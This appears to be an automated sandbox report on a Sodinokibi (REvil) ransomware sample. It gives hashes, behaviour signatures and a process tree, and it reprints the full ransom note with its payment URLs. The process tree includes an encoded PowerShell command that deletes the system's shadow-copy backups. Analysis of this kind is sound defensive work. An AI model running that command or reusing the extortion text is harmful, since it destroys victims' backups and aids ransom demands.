Overview

overview

10

Static

static

10

1e13416a37...18.exe

windows7-x64

10

1e13416a37...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    143s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    06/05/2024, 19:43

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    1e13416a37f6abaa3abafc701760fe81_JaffaCakes118.exe

  • Size

    165KB

  • MD5

    1e13416a37f6abaa3abafc701760fe81

  • SHA1

    9b767c6c7aaace08c934f922ff3d9aae056fdb0a

  • SHA256

    b46db6bba1f77f8e3378b6f07a789d19500ae7dece3c09c10549a88b04f47867

  • SHA512

    ba75d54d07a2b57381d72e626a11f16ec17c6db5bf02ca004b10c8876703478f614596c37e083deaa98a7472efc0441ba2acebc8d57a430d9e0cc3c7c88d833f

  • SSDEEP

    3072:eCEq0R0nZ5ys5n4Y9doh7O79siUs/Na5dz7ZVMoJk71fC8:lw02sJPi7O93NqlVMoM

Score
10/10
sodinokibipersistenceransomware

Malware Config

Extracted

Path

C:\Recovery\3y5ici9-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension 3y5ici9. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3624285A159EDA97 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/3624285A159EDA97 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 9gcHjDS+3VZ+/LWjfNpvBuysHKbCgzwVs3veHzATz9EOf9UdZ3tflOfsmccEbdgX DhQTiEJBef+52W9tBP9dGVszj3BXvjKN5BIFlUaDAXORCln23qZwULdMpk18yCaU VssilulINJw2M0SDBYcVYep9zz0MSvpm3+IUuWBRz3XUaS1r7Py1m7tuUIlFJIAq esHpGmxr22ZX8ZOnlTJjKl8nJ5YdvCCW/wDnJdh34w+HUf05F06ziH6lkChn2ZPG m/bnpSBlb+NHoTwBRWZaL5/YXMrQcJ77GF7d33IEADK8Mm/ymTF/N5VMnosDlwzp Vl8sB9+rEIovY95owvo/O9Tav9yWydidHKUNnArOOo23w/7arAFen2maIjhMCEvD 99cC5HCYJQ7ot75vledpN3X3ea73Yb8Xm/y393Ndtn21taGnFOKDQe2AeSzEnoHR yI7YE2xQILsbUOS650Ybwl2JpF6ibyfb4h/MTWUAeWMW1aJvt415FbT3vhfy5Qvq +i1fvHG4qickSM1zHXXDJ4js706n/EdvJvJqzYKXWmetc4TSa1ts2eFO7iyLA/rB FCh4BVmh4ZDydocJBWt9ii/CViQWg2YcL7VdAWURbXLQucq/LDiBjL9oWEhXw/k5 m1dZCnhoH1rf71p5afKu1zAtpfM8BWbJLc9J6fcS6psCwhWQ2XuwhmTTTv41Q1A7 NSU7e//o2xOYpYecU2jjKJ0W2HOxcKioJ8kZ76gAezROqATLLD0Pelwp6S6+N8yU futxqsu2ngF8oR11CpbcUk9sZDrgjMGYItelDvnVeb7xUZUK7hMgzCSimZKbgP8W qC/e+GV9xznaS8jVZ3t3dnrr326DU/r5aKMp8MzVy9oIXXtJfiHhUZ0NEvZcOXNg pwB/iy0L7DrjiYp2fEtrmkwbwjtPKnAWefi0HV1KM6qe/7UTWXnQRwsmguOVruHn dWgcwSqv+dJM5i3rP/jZfcic+JL1dRFE5EsdQ5SmJKeSNQBQFb5ixYW2Pf3lkuQ5 rpnjyjJBSIFBuQeWvWTg8RS2w5QshVurQmO6p8/KUl5GGPHLIL5e/B4kkFDnjWFc QYL7pllfUEyC9kE8UhBXwYaFvPLvw1B/Tp2v2fW09P+ECS1xACTyCmG9hWnfWKWo tChWhieatQ79FO1jb03caUFPM7GUEyCoTrNzpwpUUWuOw7PPWOgmV2lfNOgC2oVE f4SHCw4EYPKD1HSv3kI= Extension name: 3y5ici9 -------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3624285A159EDA97

http://decryptor.top/3624285A159EDA97

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 36 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\1e13416a37f6abaa3abafc701760fe81_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\1e13416a37f6abaa3abafc701760fe81_JaffaCakes118.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2368
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2992
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1468
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3000

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Recovery\3y5ici9-readme.txt
      Filesize

      6KB

      MD5

      eaec106b5752dd1bd9e22ce63abd305f

      SHA1

      531ceaacc328f9c4308564cc26df76766d9d064c

      SHA256

      47f777f12ef26d4ee6052cd12dd1c220c904f8cc062fd90ef78f22cd0404d6ff

      SHA512

      228a0da2b3da12c28c3ea078fd5e146ed536153dbaa219a1a145ef23e01d05c041411935d72529f16f528349931d120ee2c168ceae7f2990b748d9bb87bdecf7

      Download Submit

    • memory/2992-4-0x000007FEF589E000-0x000007FEF589F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2992-5-0x000000001B680000-0x000000001B962000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2992-6-0x00000000021E0000-0x00000000021E8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2992-7-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2992-8-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2992-9-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2992-10-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2992-11-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2992-12-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp

      Filesize

      9.6MB

      Download